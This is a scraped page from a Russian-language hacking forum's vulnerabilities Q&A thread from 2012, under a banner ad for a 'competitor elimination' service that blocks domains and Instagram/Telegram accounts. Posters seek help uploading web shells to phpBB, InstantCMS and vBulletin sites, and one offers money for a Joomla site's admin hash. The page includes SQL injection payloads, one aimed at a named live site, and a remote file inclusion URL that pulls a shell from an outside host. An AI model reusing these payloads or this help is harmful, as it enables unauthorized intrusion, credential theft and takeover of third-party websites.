УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2079 из 2438

2079

Опции темы

Поиск в этой теме

Опции просмотра

#20781

05.06.2012, 18:11

LelouchMe

Guest

Сообщений: n/a

Провел на форуме:
6667

Репутация: 0

Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...

#20782

05.06.2012, 20:22

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от LelouchMe

LelouchMe said:
Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...

Нет.

#20783

05.06.2012, 23:57

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Отправить сообщение для Sleep с помощью ICQ

Существует ли способ залить шелл через InstantCMS v1.9.1 ?

и какие есть еще способы залить шелл через phpbb 3.0.10.

редактировать стили не получается

Код:

Code:
Incorrect string value: '\xC1\xF0\xFF\xED\xF1\xEA...' for column 'template_data' at row 1 [1366]...

через восстановление бд тоже не катит (((

#20784

06.06.2012, 00:38

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от Sleep

Sleep said:
Существует ли способ залить шелл через InstantCMS v1.9.1 ?

А через "Баннеры" пробовали? Это вроде единственный способ в ней, вроде!

#20785

06.06.2012, 09:24

promarketing

Guest

Сообщений: n/a

Провел на форуме:
3814

Репутация: 0

Joomla 1.5

index.php?option=com_weblinks&view=category&id=29& filter_order=%00'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344 Community Links

Warning: Invalid argument supplied for foreach() in /home/site_webmaster/www.site.com/components/com_weblinks/views/category/tmpl/default_items.php on line 38

$20 za pomosh v polycheniyy hasha admina esli vozmojno

#20786

06.06.2012, 10:19

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от promarketing

promarketing said:
Joomla 1.5
index.php?option=
com_weblinks
&view=category&id=29&filter_order=%00'

Ну поиск то для кого ?

Цитата:

Сообщение от None

################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_weblinks
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id =-1 UNION SELECT 1,2,3,4,5
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
################################################## #################

Взято отсюда

Exploit #1

Exploit #2

#20787

06.06.2012, 14:53

promarketing

Guest

Сообщений: n/a

Провел на форуме:
3814

Репутация: 0

Цитата:

Сообщение от BigBear

BigBear said:
Ну поиск то для кого ?
Взято
отсюда
Exploit #1
Exploit #2

tam sql inj ne v "id" a v "filter_order="

http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.5_21%5D_sql_injection

#20788

06.06.2012, 17:30

mr_zedox

Guest

Сообщений: n/a

Провел на форуме:
9778

Репутация: 0

Есть форум на vbulletin 3.8.4, есть эксплоит:

Цитата:

Сообщение от None

[path]/includes/functions.php?$classfile=[shell].txt?

Шо за "path" и как здесь залить шел? ПРописать полный путь до шела на моем хосте? Вот так:

Цитата:

Сообщение от None

[path]/includes/functions.php?$classfile=http://www.site.ru/shell.txt?

А дальше, как в php его запустить?

#20789

06.06.2012, 22:50

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

http://www.mindsoul.ru/index.php?id=628

хелп, чёт ничего не выводит

#20790

06.06.2012, 22:55

smirk

Guest

Сообщений: n/a

Провел на форуме:
45774

Репутация: 26

Цитата:

Сообщение от qaz

qaz said:
http://www.mindsoul.ru/index.php?id=628
хелп, чёт ничего не выводит

http://www.mindsoul.ru/index.php?id=-628)+union+select+version()+--+

ток обрезает, надо через базед крутить..

Страница 2079 из 2438

2079

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход